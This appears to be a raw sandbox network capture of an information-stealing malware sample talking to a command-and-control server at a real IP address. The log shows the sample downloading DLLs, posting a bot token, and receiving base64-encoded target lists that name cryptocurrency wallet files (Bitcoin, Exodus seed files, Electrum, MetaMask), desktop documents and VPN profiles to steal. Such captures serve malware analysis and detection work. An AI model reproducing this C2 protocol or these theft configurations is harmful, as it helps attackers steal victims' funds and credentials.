00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 27, 2023 18:13:24.102252960 CET	90	OUT	GET /f059ec3d7eb90876/softokn3.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 18:13:24.572801113 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:24 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 27, 2023 18:13:25.424127102 CET	94	OUT	GET /f059ec3d7eb90876/vcruntime140.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 18:13:25.826719046 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:25 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 27, 2023 18:13:27.705708027 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJK Host: 5.42.66.58 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:28.639575958 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:29.635605097 CET	464	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE Host: 5.42.66.58 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="message"wallets------HIIIDAKKJJJKKECAKKJE--
Dec 27, 2023 18:13:30.028681040 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1576 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 64 68 62 47 78 6c 64 43 35 6b 59 58 52 38 4d 58 78 43 61 58 52 6a 62 32 6c 75 49 45 4e 76 63 6d 55 67 54 32 78 6b 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 62 32 64 6c 59 32 39 70 62 6e 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 58 46 4a 68 64 6d 56 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 66 46 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 4e 6f 5a 53 6f 75 63 33 46 73 61 58 52 6c 66 44 42 38 51 6d 78 76 59 32 74 7a 64 48 4a 6c 59 57 30 67 52 33 4a 6c 5a 57 35 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 58 46 64 68 62 47 78 6c 64 46 64 68 63 32 46 69 61 56 78 44 62 47 6c 6c 62 6e 52 63 56 32 46 73 62 47 56 30 63 31 78 38 4b 69 35 71 63 32 39 75 66 44 42 38 52 58 52 6f 5a 58 4a 6c 64 57 31 38 58 45 56 30 61 47 56 79 5a 58 56 74 58 48 78 72 5a 58 6c 7a 64 47 39 79 5a 58 77 77 66 45 56 73 5a 57 4e 30 63 6e 56 74 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 78 63 52 57 78 6c 59 33 52 79 64 57 30 74 54 46 52 44 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 56 34 62 32 52 31 63 33 78 63 52 58 68 76 5a 48 56 7a 58 48 78 6c 65 47 39 6b 64 58 4d 75 59 32 39 75 5a 69 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 47 46 7a 63 33 42 6f 63 6d 46 7a 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 32 56 6c 5a 43 35 7a 5a 57 4e 76 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 78 63 52 57 78 6c 59 33 52 79 62 32 35 44 59 58 4e 6f 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 31 31 62 48 52 70 52 47 39 6e 5a 58 78 63 54 58 56 73 64 47 6c 45 62 32 64 6c 58 48 78 74 64 57 78 30 61 57 52 76 5a 32 55 75 64 32 46 73 62 47 56 30 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 49 43 68 76 62 47 51 70 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 46 4e 30 62 33 4a 68 5a 32 56 63 66 47 5a 70 62 47 56 66 58 7a 41 75 62 47 39 6a 59 57 78 7a 64 47 39 79 59 57 64 6c 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 66 46 78 6a 62 32 30 75 62 47 6c 69 5a 58 4a 30 65 53 35 71 59 58 68 34 58 45 6c 75 5a 47 56 34 5a 57 52 45 51 6c 78 6d 61 57 Data Ascii: Qml0Y29pbiBDb3JlfFxCaXRjb2luXHdhbGxldHNcfHdhbGxldC5kYXR8MXxCaXRjb2luIENvcmUgT2xkfFxCaXRjb2luXHwqd2FsbGV0Ki5kYXR8MHxEb2dlY29pbnxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8XFJhdmVuXHwqd2FsbGV0Ki5kYXR8MHxEYWVkYWx1cyBNYWlubmV0fFxEYWVkYWx1cyBNYWlubmV0XHdhbGxldHNcfHNoZSouc3FsaXRlfDB8QmxvY2tzdHJlYW0gR3JlZW58XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8XFdhbGxldFdhc2FiaVxDbGllbnRcV2FsbGV0c1x8Ki5qc29ufDB8RXRoZXJldW18XEV0aGVyZXVtXHxrZXlzdG9yZXwwfEVsZWN0cnVtfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3xcRWxlY3RydW0tTFRDXHdhbGxldHNcfCouKnwwfEV4b2R1c3xcRXhvZHVzXHxleG9kdXMuY29uZi5qc29ufDB8RXhvZHVzfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8cGFzc3BocmFzZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8c2VlZC5zZWNvfDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHxcRWxlY3Ryb25DYXNoXHdhbGxldHNcfCouKnwwfE11bHRpRG9nZXxcTXVsdGlEb2dlXHxtdWx0aWRvZ2Uud2FsbGV0fDB8SmF4eCBEZXNrdG9wIChvbGQpfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAubG9jYWxzdG9yYWdlfDB8SmF4eCBEZXNrdG9wfFxjb20ubGliZXJ0eS5qYXh4XEluZGV4ZWREQlxmaW
Dec 27, 2023 18:13:30.138082027 CET	462	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDB Host: 5.42.66.58 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 2d 2d 0d 0a Data Ascii: ------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="message"files------AEGHJKJKKJDHIDHJKJDB--
Dec 27, 2023 18:13:30.531908035 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU
Dec 27, 2023 18:13:31.982215881 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:32.957483053 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:33.242115974 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKF Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
